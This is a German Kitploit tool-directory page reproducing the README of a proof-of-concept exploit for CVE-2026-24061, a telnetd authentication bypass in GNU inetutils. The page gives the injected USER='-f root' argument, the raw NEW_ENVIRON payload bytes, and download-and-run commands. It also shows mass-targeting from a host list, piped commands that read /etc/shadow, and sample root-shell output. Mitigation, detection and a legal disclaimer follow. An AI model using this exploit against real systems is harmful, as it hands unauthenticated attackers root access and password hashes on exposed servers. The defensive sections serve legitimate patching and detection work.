Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU inetutils-telnetd, die es nicht authentifizierten Remote-Angreifern ermöglicht, sofortigen Root-Shell-Zugriff über bösartige NEW_ENVIRON-Telnet-Optionsausnutzung zu erhalten. | Kitploit
Tools/GitHubGitHub/sh4den/cve-2026-24061
Privilege EscalationSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsCommand and ControlAuthentifizierungPapers & ForschungLernen & BildungRemote-Access-Tool
GitHubsh4den/cve-2026-24061

CVE-2026-24061

613vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof of Concept: CVE-2026-24061 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU inetutils-telnetd, die es nicht authentifizierten Remote-Angreifern ermöglicht, sofortigen Root-Shell-Zugriff über bösartige NEW_ENVIRON-Telnet-Optionsausnutzung zu erhalten.

Repository anzeigen

CVE-2026-24061

GNU inetutils-telnetd - Remote Authentication Bypass

Ein Sicherheitsforschungstool zur Ausnutzung von CVE-2026-24061, einer kritischen Remote-Authentifizierungsumgehungsschwachstelle in GNU inetutils-telnetd, die sofortigen Root-Shell-Zugriff ohne Authentifizierung ermöglicht.


Inhaltsverzeichnis

  • Zusammenfassung der Schwachstelle
  • Betroffene Versionen
  • Technische Analyse
  • Voraussetzungen
  • Installation
  • Verwendung
  • Ausgabereferenz
  • Ausnutzungsmethodik
  • Minderung und Behebung
  • Indikatoren einer Kompromittierung
  • Rechtlicher Haftungsausschluss
  • Referenzen
  • Danksagungen

Zusammenfassung der Schwachstelle

FeldWert
CVE-KennungCVE-2026-24061
CVSS v3.1 Score9.8 (Kritisch)
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-KlassifizierungCWE-88: Unzureichende Neutralisierung von Argumenttrennzeichen in einem Befehl
AnbieterGNU-Projekt
Produktinetutils-telnetd
Offenlegungsdatum20. Januar 2026
Patch verfügbarTBD

Management-Zusammenfassung

Eine kritische Schwachstelle in GNU inetutils-telnetd bis Version 2.7 ermöglicht es nicht authentifizierten entfernten Angreifern, die Authentifizierung vollständig zu umgehen und sofortigen Root-Shell-Zugriff zu erlangen. Die Schwachstelle wird über die Telnet-Option NEW_ENVIRON ausgenutzt, indem eine speziell präparierte Umgebungsvariable USER mit dem Wert "-f root" injiziert wird, die alle Authentifizierungsmechanismen umgeht.

Auswirkungsbewertung

  • Vertraulichkeit: Vollständige Kompromittierung von Systemdaten
  • Integrität: Vollständige Systemkontrolle mit Root-Rechten
  • Verfügbarkeit: Potenzial für vollständige Systemübernahme oder Denial-of-Service
  • Umfang: Unverändert – die Ausnutzung betrifft nur den anfälligen Telnet-Dienst

Betroffene Versionen

VersionsbereichStatus
<= 2.7Anfällig
> 2.7Patch-Status TBD

Technische Analyse

Grundursache der Schwachstelle

Die Schwachstelle entsteht durch eine unsachgemäße Validierung der Umgebungsvariablen USER im Handler der Telnet-Option NEW_ENVIRON. Bei der Verarbeitung der Telnet-Option NEW_ENVIRON versäumt der Telnetd-Dienst es, den Wert der USER-Variablen zu bereinigen, bevor er an den Login-Prozess übergeben wird. Indem der Angreifer USER auf "-f root" setzt, injiziert er Befehlszeilenargumente, die die Authentifizierung für den Root-Benutzer ohne Angabe von Anmeldeinformationen erzwingen.

Angriffsvektor

  1. Angreifer stellt eine Verbindung zum Telnetd-Dienst her (typischerweise Port 23)
  2. Während der Telnet-Optionsaushandlung fordert der Server NEW_ENVIRON-Daten an
  3. Angreifer antwortet mit der Umgebungsvariablen USER, die auf "-f root" gesetzt ist
  4. Das bösartige Argument umgeht die Authentifizierungsprüfungen
  5. Sofortiger Root-Shell-Zugriff wird ohne Passwortabfrage gewährt
  6. Vollständige Systemkompromittierung ist erreicht

Ausnutzungskomplexität

  • Voraussetzungen: Netzwerkzugriff auf den Ziel-Telnetd-Dienst
  • Authentifizierung: Nicht erforderlich
  • Benutzerinteraktion: Keine
  • Angriffskomplexität: Niedrig

Voraussetzungen

Systemanforderungen

  • Python 3.7 oder höher
  • Netzwerkkonnektivität zu den Ziel-Telnetd-Instanzen
  • Ausreichende Berechtigungen zur Ausführung von Python-Skripten

Abhängigkeiten

Alle Abhängigkeiten sind Teil der Python-Standardbibliothek:


Installation

Methode 1: Mit Git

root@kitploit:~
# Repository klonen
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Exploit ausführen
python3 main.py -u <ziel_ip>

Methode 2: Direkter Download

root@kitploit:~
# Exploit herunterladen
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Ausführbar machen (Linux/macOS)
chmod +x main.py

# Exploit ausführen
python3 main.py -u <ziel_ip>

Methode 3: Manuelle Installation

root@kitploit:~
# Sicherstellen, dass Python 3.7+ installiert ist
python3 --version

# Herunterladen und ausführen
python3 main.py -u <ziel_ip>

Verwendung

Befehlszeilenschnittstelle

root@kitploit:~
Verwendung:
    python3 main.py -u <ziel_ip> [-p <port>] [-usr <benutzer>]
    python3 main.py -l <ziele_datei> [-p <port>] [-usr <benutzer>]
    echo "befehle" | python3 main.py -u <ziel_ip>

Argumente:
    -u          Einzelne Ziel-IP-Adresse oder Hostname
    -l          Pfad zu einer Datei mit Ziel-IPs (eine pro Zeile)
    -p          Zielport (Standard: 23)
    -usr        Benutzer, für den der Exploit ausgeführt wird (Standard: root)

Einzelziel-Ausnutzung

Ausnutzung einer einzelnen Telnetd-Instanz:

root@kitploit:~
# Basis-Ausnutzung (Standardport 23, Benutzer root)
python3 main.py -u 192.168.1.100

# Benutzerdefinierter Port
python3 main.py -u 192.168.1.100 -p 2323

# Anderer Benutzer
python3 main.py -u 192.168.1.100 -usr admin

Befehlsausführungsmodus

Befehle nicht-interaktiv ausführen:

root@kitploit:~
# Einzelner Befehl
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Mehrere Befehle
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Befehl mit Ausgabeumleitung
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Bulk-Ziel-Ausnutzung

Mehrere Ziele aus einer Datei ausnutzen:

root@kitploit:~
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

Zieldateiformat (targets.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Hinweise:

  • Ein Ziel pro Zeile
  • IP-Adressen oder Hostnamen
  • Leere Zeilen werden ignoriert
  • Ziele werden gleichzeitig mittels Threading ausgenutzt

Ausgabereferenz

Statusindikatoren

Beispielausgabe

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Ausnutzungsmethodik

Telnet-Protokoll-Aushandlungsprozess

Der Exploit nutzt die Aushandlungsphase des Telnet-Protokolls:

  1. Erstverbindung: TCP-Verbindung zum Zielport hergestellt
  2. Optionsaushandlung: Server sendet DO/WILL-Befehle für verschiedene Telnet-Optionen
  3. TTYPE-Vereinbarung: Client stimmt zu, den Terminaltyp zu senden (WILL TTYPE)
  4. TSPEED-Vereinbarung: Client stimmt zu, die Terminalgeschwindigkeit zu senden (WILL TSPEED)
  5. NEW_ENVIRON-Vereinbarung: Client stimmt zu, Umgebungsvariablen zu senden (WILL NEW_ENVIRON)
  6. Subaushandlung: Server fordert Umgebungsvariablen an (SB NEW_ENVIRON SEND)
  7. Payload-Injektion: Client sendet USER="-f root" in der NEW_ENVIRON-Antwort
  8. Authentifizierungsumgehung: Server verarbeitet die bösartige USER-Variable
  9. Shell-Zugriff: Root-Shell ohne Authentifizierung gewährt

Payload-Struktur

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

Interaktive Sitzungsbehandlung

  • Eingabe-Multiplexing: Verwendet select.select() für die gleichzeitige Überwachung von Socket und stdin
  • Nicht-blockierende E/A: Socket für nicht-blockierende Operationen konfiguriert
  • Telnet-Verarbeitung: IAC-Sequenzen werden aus der Ausgabe für eine saubere Anzeige entfernt
  • Timeout-Verwaltung: 30-Sekunden-Timeout für die Befehlsausführung

Minderung und Behebung

Sofortmaßnahmen

  1. telnetd deaktivieren: Telnetd-Dienst sofort stoppen und deaktivieren

    root@kitploit:~
    # systemd-basierte Systeme
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-basierte Systeme
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. Firewall-Regeln: Telnet-Port (23) auf Firewall-Ebene blockieren

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. Netzwerkisolation: Telnet-Dienst von internetfähigen Systemen entfernen

    • Nur interne Netzsegmente verwenden
    • Netzwerkzugriffskontrolllisten (ACLs) implementieren

Langfristige Empfehlungen

Alternative Lösungen

SSH anstelle von Telnet verwenden:

root@kitploit:~
# OpenSSH-Server installieren
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# SSH aktivieren und starten
sudo systemctl enable sshd
sudo systemctl start sshd

Überprüfung nach der Minderung

root@kitploit:~
# Überprüfen, ob telnetd nicht läuft
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Sollte keine Ergebnisse liefern, wenn ordnungsgemäß deaktiviert

Indikatoren einer Kompromittierung

Log-Analyse

Systemprotokolle auf folgende Muster überprüfen:

Authentifizierungsprotokolle:

root@kitploit:~
# Nach ungewöhnlichen Anmeldemustern suchen
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Nach verdächtigen USER-Umgebungsvariablen suchen
sudo grep "USER.*-f" /var/log/auth.log

Netzwerkprotokolle:

  • Telnet-Verbindungen von unerwarteten IP-Adressen
  • Verbindungen zu Port 23 außerhalb der normalen Betriebszeiten
  • Mehrere schnelle Verbindungen zum Telnet-Dienst

Systemartefakte

  • Unerwartete Prozesse, die als root laufen
  • Modifizierte Systemkonfigurationsdateien
  • Nicht autorisierte Benutzerkonten
  • Neue SSH-Schlüssel in /root/.ssh/authorized_keys
  • Verdächtige Cron-Jobs oder geplante Aufgaben

Netzwerkindikatoren

  • Ausgehende Verbindungen vom Telnet-Dienstprozess
  • Datenaustritt zu externen Hosts
  • Reverse-Shell-Verbindungen
  • Portscan-Aktivitäten vom kompromittierten System
  • Laterale Bewegungsversuche zu anderen internen Systemen

Erkennungsbefehle

root@kitploit:~
# Nach aktiven Telnet-Verbindungen suchen
sudo netstat -antp | grep :23

# Aktuelle Root-Anmeldungen überprüfen
sudo last | grep root

# Nach modifizierten Systemdateien suchen
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# Prozesse nach root auflisten
sudo ps aux | grep root

# Nach nicht autorisierten SSH-Schlüsseln suchen
sudo cat /root/.ssh/authorized_keys

Rechtlicher Haftungsausschluss

WICHTIG: VOR VERWENDUNG LESEN

Dieses Tool wird streng bereitgestellt für:

  • Autorisierte Sicherheitsbewertungen und Penetrationstests
  • Bildungs- und Forschungszwecke in kontrollierten Umgebungen
  • Defensive Sicherheitsoperationen mit entsprechender Autorisierung
  • Schwachstellenbewertung von Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben

Verbotene Verwendungen:

  • Nicht autorisierter Zugriff auf Computersysteme oder Netzwerke
  • Ausnutzung von Systemen ohne ausdrückliche schriftliche Zustimmung des Eigentümers
  • Jegliche Aktivität, die gegen lokale, staatliche, bundesstaatliche oder internationale Gesetze verstößt
  • Bösartige Aktivitäten oder nicht autorisierte Systemkompromittierung

Haftung: Die Autoren, Mitwirkenden und Verteiler dieser Software übernehmen KEINE Verantwortung oder Haftung für Missbrauch, Schäden oder illegale Aktivitäten, die mit diesem Tool durchgeführt werden. Die Benutzer sind allein verantwortlich für:

  • Die Einhaltung aller geltenden Gesetze und Vorschriften
  • Das Einholen der ordnungsgemäßen Autorisierung vor der Durchführung von Sicherheitstests
  • Alle Folgen, die sich aus der Nutzung oder dem Missbrauch dieser Software ergeben

Rechtlicher Hinweis: Nicht autorisierter Zugriff auf Computersysteme ist eine schwere Straftat. Verstöße können strafrechtlich verfolgt werden gemäß:

  • Computer Fraud and Abuse Act (CFAA) - Vereinigte Staaten (18 U.S.C. § 1030)
  • Computer Misuse Act 1990 - Vereinigtes Königreich
  • Richtlinie der Europäischen Union über Angriffe auf Informationssysteme
  • Ähnliche Gesetzgebung in anderen Rechtsordnungen weltweit

Strafen können Freiheitsstrafen, erhebliche Geldstrafen und zivilrechtliche Haftung umfassen.

Durch die Nutzung dieses Tools bestätigen Sie, dass Sie diesen Haftungsausschluss und alle geltenden Gesetze gelesen, verstanden haben und sich damit einverstanden erklären.


Referenzen

Offizielle Ressourcen

  • GNU Inetutils Homepage
  • GNU Inetutils Dokumentation

Schwachstelleninformationen

  • NVD - CVE-2026-24061
  • MITRE CVE-Eintrag
  • OpenWall Offenlegung (20. Jan. 2026)
  • OpenWall Diskussion (20. Jan. 2026)
  • OpenWall Update (22. Jan. 2026)

Verwandte Dokumentation

  • CWE-88: Unzureichende Neutralisierung von Argumenttrennzeichen
  • Telnet-Protokollspezifikation (RFC 854)
  • Telnet-Umgebungsoption (RFC 1408)
  • OWASP Command Injection

Sicherheitsbest Practices

  • NIST Richtlinien für Remote-Zugriff
  • CIS Benchmarks
  • SANS Sicherheitsressourcen

Danksagungen

  • Exploit-Autor: IRIS C2 Team
  • Framework: Teil des HGrab Framework
  • Entdeckung: Sicherheitsforschungsgemeinschaft
  • Offenlegung: Mitwirkende der OpenWall-Mailingliste

Änderungsprotokoll

VersionDatumÄnderungen
1.0.02026-01-23Erstveröffentlichung

Support und Kontakt

Bei Fragen, Problemen oder Beiträgen:

  • Probleme: Melden Sie Fehler oder wünschen Sie Funktionen über GitHub Issues
  • Sicherheit: Melden Sie Schwachstellen verantwortungsvoll an die Betreuer
  • Beiträge: Pull-Requests sind willkommen

Lizenz

Dieses Projekt wird für autorisierte Sicherheitsforschung und Bildungszwecke nur im Ist-Zustand bereitgestellt. Es wird keine Garantie, weder ausdrücklich noch stillschweigend, übernommen. Nutzung auf eigenes Risiko und in Übereinstimmung mit allen geltenden Gesetzen und Vorschriften.

NUR MIT ORDNUNGSGEMÄSSER AUTORISIERUNG VERWENDEN

Tool herunterladen
PaketZweck
socketNetzwerkkommunikation
selectI/O-Multiplexing
sysSysteminteraktion
osBetriebssystemschnittstelle
threadingGleichzeitige Zielausnutzung
datetimeZeitstempelformatierung
IndikatorFarbeBeschreibung
[SUCCESS]GrünErfolgreich mit Ziel verbunden
[EXPLOIT]GrünAusnutzungs-Payload erfolgreich gesendet
[INFO]BlauInformationsmeldung über aktuellen Vorgang
[ERROR]RotVerbindungsfehler, Zeitüberschreitung oder Ausnutzungsfehler
[WARNING]GelbWarnmeldung (derzeit nicht verwendet)
AktionPrioritätBeschreibung
SSH-MigrationKritischTelnet durch SSH für Remote-Zugriff ersetzen
Patch-ManagementKritischSicherheitsupdates überwachen und anwenden
Dienst-AuditHochNicht benötigte Netzwerkdienste identifizieren und deaktivieren
NetzwerksegmentierungHochKritische Systeme von öffentlichen Netzwerken isolieren
EindringungserkennungMittelIDS/IPS zur Erkennung von Ausnutzungsversuchen bereitstellen
ZugriffskontrolleMittelIP-Whitelisting für Remote-Dienste implementieren